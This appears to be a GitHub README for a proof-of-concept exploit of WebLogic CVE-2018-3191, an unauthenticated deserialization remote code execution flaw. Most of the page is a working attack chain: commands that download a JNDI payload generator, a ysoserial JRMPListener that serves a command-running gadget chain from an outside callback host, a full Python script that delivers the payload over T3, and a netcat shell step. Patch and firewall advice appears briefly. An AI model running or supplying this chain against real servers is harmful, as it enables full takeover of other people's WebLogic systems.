CVE-2018-3191
Latest commit a440fe6 Oct 25, 2018
Repository contents (all files last updated Oct 24, 2018):

- README.md
- generate-payload.jpg
- get-tcp-shell.jpg
- jas502n-poc.txt
- jas502n.txt
- listener-port-rmi.jpg
- push.sh
- send-payload.jpg
- send.jpg
- weblogic-web.jpg
- weblogic.jpg
- weblogic.py
- ysoserial-0.0.6-SNAPSHOT-BETA-all.jar


WebLogic CVE-2018-3191 remote code execution vulnerability

Tested against WebLogic running in a Docker environment.

0x00 Introduction

On October 17 (Beijing time), Oracle's October Critical Patch Update (CPU) fixed a high-severity WebLogic Server remote code execution vulnerability, CVE-2018-3191.

The vulnerability allows an unauthenticated attacker with network access to the T3 protocol port to compromise a vulnerable WebLogic Server. Successful exploitation results in a full takeover of WebLogic Server, i.e. remote code execution as the WebLogic process user.

Oracle CPU advisory:

https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html

Official fix:

Oracle fixed the vulnerability in the October Critical Patch Update (CPU); affected users are strongly advised to apply the update as soon as possible. If the patch cannot be applied immediately, restrict who can reach the T3/T3S listener: either firewall port 7001 (or whatever port the server's channel uses) so that only trusted hosts can connect, or configure a WebLogic connection filter (weblogic.security.net.ConnectionFilterImpl with a rule such as `0.0.0.0/0 * * deny t3 t3s`, plus allow rules for trusted sources). Note that this only blocks the transport used by this PoC; it does not remove the deserialization gadget, so it is a workaround, not a fix.

https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html#AppendixFMW

0x01 Generate Payload

The generator jar (from voidfyoo's repository, linked in 0x05) serializes a Spring JtaTransactionManager object whose readObject() performs a JNDI lookup of the address you pass on the command line. That lookup is what makes the vulnerable server connect back to an attacker-controlled RMI/JRMP listener (started in 0x02), so the argument must be the URL of that listener. Download the jar that matches the target version, then run:

```
wget https://github.com/voidfyoo/CVE-2018-3191/releases/download/10.3.6.0/weblogic-spring-jndi-10.3.6.0.jar
wget https://github.com/voidfyoo/CVE-2018-3191/releases/download/12.2.1.3/weblogic-spring-jndi-12.2.1.3.jar

java -jar weblogic-spring-jndi.jar <jndi_address>
```

Example:

```
java -jar weblogic-spring-jndi.jar rmi://192.168.1.1:1099/Exp
```

The command used in this write-up (stdout redirected to jas502n.txt, which weblogic.py sends in 0x03):

```
java -jar weblogic-spring-jndi-10.3.6.0.jar rmi://www.canyouseeme.cc:6668/Jas502n > jas502n.txt
```

Which jar to use:

- weblogic-spring-jndi-12.2.1.3.jar for WebLogic 12.2.1.3
- weblogic-spring-jndi-10.3.6.0.jar for WebLogic 10.3.6.0, 12.2.1.0, 12.1.3.0 and 12.2.1.1

Payload (hex): the hex dump written to jas502n.txt by the command above.

0x02 Listen with a Java RMI (JRMP) listener

When the target resolves the JNDI address, ysoserial's JRMPListener answers the RMI request with a second serialized gadget chain that carries the command to run:

```
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 6668 CommonsCollections1 "command"
```

The port (6668) must match the port in the rmi:// URL used in 0x01. The gadget chain must exist on the target's classpath and work with its JDK: CommonsCollections1 needs commons-collections 3.x and relies on sun.reflect.annotation.AnnotationInvocationHandler, which stopped working on Java 8u72 and later, so choose a chain that fits the target (for example one of the other CommonsCollections chains in ysoserial).

```
root@374bb3d9a2d8:/tools# ./rmi.sh
* Opening JRMP listener on 6668
```

0x03 Send Payload to T3

weblogic.py connects to the T3 port (7001 here), performs the T3 handshake and then sends the hex payload from jas502n.txt:

```
python weblogic.py www.canyouseeme.cc 7001 jas502n.txt
```
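Steps 0x01 to 0x03 together are: generate a hex payload, start a JRMP listener, then deliver the payload over T3. The following is an added example of the T3 delivery step written for this edit; it is not the repository's weblogic.py and does not reproduce its code. It performs the T3 client handshake, parses the server's HELO banner (useful on its own as a check that the port really speaks T3 and which version is listening), and only then forwards the payload bytes. It assumes the generator's hex dump is the complete message to send after the handshake (which is how the page uses jas502n.txt), and the HELO banner shown in the docstring is a constructed sample, not captured output.

```python
#!/usr/bin/env python3
"""Added example (not the repository's weblogic.py): T3 handshake,
HELO fingerprint, then forward a hex-encoded payload file.
Hostnames, ports and the HELO sample are assumptions for illustration."""
import binascii
import socket
import sys

# T3 client banner sent first. The advertised protocol version only needs to
# be one the server accepts; this string is answered by 10.3.6 and 12.x alike.
T3_CLIENT_HELLO = b"t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n"

# Versions the page's generator jars target (taken from the README's list).
TARGET_VERSIONS = ("10.3.6.0", "12.1.3.0", "12.2.1.0", "12.2.1.1", "12.2.1.3")


def parse_helo(banner: bytes):
    """Parse the server's T3 HELO reply into (version, ssl_flag).

    A plaintext T3 listener answers with a banner shaped like the constructed
    sample  b"HELO:12.2.1.3.false\\nAS:2048\\nHL:19\\nMS:10000000\\n\\n"
    where the field after 'HELO:' is <version>.<ssl-bool>.
    Returns None when the reply is not a T3 HELO (the port is closed to T3
    or a different service, e.g. HTTP, answered).
    """
    first = banner.split(b"\n", 1)[0].decode("ascii", "replace").strip()
    if not first.startswith("HELO:"):
        return None
    ident = first[len("HELO:"):]
    version, _, ssl_flag = ident.rpartition(".")
    return version, ssl_flag == "true"


def in_scope(version: str) -> bool:
    """True if the fingerprinted version is one the page's jars target."""
    return version in TARGET_VERSIONS


def load_hex_payload(text: str) -> bytes:
    """Decode the generator's hex dump (jas502n.txt); whitespace is ignored."""
    return binascii.unhexlify("".join(text.split()))


def t3_send(host: str, port: int, payload: bytes, timeout: float = 10.0):
    """Handshake over T3, then forward the serialized payload.

    Returns the parsed HELO tuple, or None if the port did not speak T3,
    in which case nothing is sent."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(T3_CLIENT_HELLO)
        helo = parse_helo(s.recv(1024))
        if helo is None:
            return None
        s.sendall(payload)
        # A successful deserialization is not acknowledged on this socket;
        # the effect shows up at the JRMP listener from 0x02 instead.
        try:
            s.recv(1024)
        except socket.timeout:
            pass
    return helo


if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit(f"usage: {sys.argv[0]} <host> <port> <payload.hex>")
    host, port, path = sys.argv[1], int(sys.argv[2]), sys.argv[3]
    with open(path) as fh:
        data = load_hex_payload(fh.read())
    result = t3_send(host, port, data)
    if result is None:
        print("no T3 HELO from target; nothing sent")
    else:
        ver, ssl = result
        print(f"T3 HELO version={ver} ssl={ssl} in_scope={in_scope(ver)} "
              f"sent {len(data)} bytes")
```

Run it as `python3 t3send.py <host> 7001 jas502n.txt`. Because it refuses to send unless a HELO came back, the same script doubles as a quick exposure check for a T3 listener: a version that is in scope and reachable from untrusted networks is exactly what the connection-filter or firewall workaround in 0x00 is meant to prevent.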

0x04 Get a netcat shell (see get-tcp-shell.jpg)

0x05 References

https://github.com/voidfyoo/CVE-2018-3191

YouTube demo video: CVE-2018-3191